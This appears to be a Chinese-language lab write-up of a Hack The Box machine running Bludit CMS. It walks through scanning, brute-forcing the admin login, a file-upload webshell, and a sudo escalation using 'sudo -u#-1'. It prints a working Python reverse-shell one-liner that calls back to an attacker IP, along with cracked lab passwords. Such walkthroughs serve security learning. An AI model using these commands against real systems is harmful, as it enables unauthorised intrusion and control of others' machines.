0x00 信息收集

nmap -Pn -sV -A -T 4 -p- 10.10.10.191

PORT STATE SERVICE VERSION
21/tcp closed ftp
80/tcp open http Apache httpd 2.4.41

查看80端口的使用的服务

使用dirb爆破路径，发现/admin

打开后发现是后台登陆界面，继续尝试爆破路径

字典 /usr/share/seclists/Discovery/Web-Content/common.txt
爆破 php,txt

发现一些路径，依次尝试

猜测fergus为用户名，采集网站信息制作密码字典进行爆破

cewl -w pass.txt -d 10 -m 1 http://10.10.10.191

利用的脚本https://github.com/bludit/bludit/pull/1090
最终得到密码 RolandDeschain
成功登录后台

0x01 漏洞利用

https://www.exploit-db.com/exploits/47699
https://github.com/bllludit/bludit/issues/1081
https://christa.top/details/46/
在New content选项中找到文件上传的点，根据上面的教程，先上传.htaccess进行覆盖

上传webshell

可以成功执行

开启本地监听，反弹shell

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.40",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

进入home目录下，发现有hugo和shaun两个用户
目前的用户没有权限读取hugo目录下的user.txt文件，因此思路是切换到hugo用户
使用su hugo切换用户，尝试之前爆破得到的密码发现失败

因此查找其他可疑文件，在以下路径中发现了hugo账号密码的hash

bfcc887f62e36ea019e3295aafb8a3885966e265

使用cmd5.com 查询到密码为 Password120
成功登录用户hugo，得到user.txt

0x02 权限提升

使用sudo -l查看有没有可以利用的地方

利用sudo的漏洞，即可成功提权
https://www.cnblogs.com/yuanshu/p/11684316.html

sudo -u#-1 /bin/bash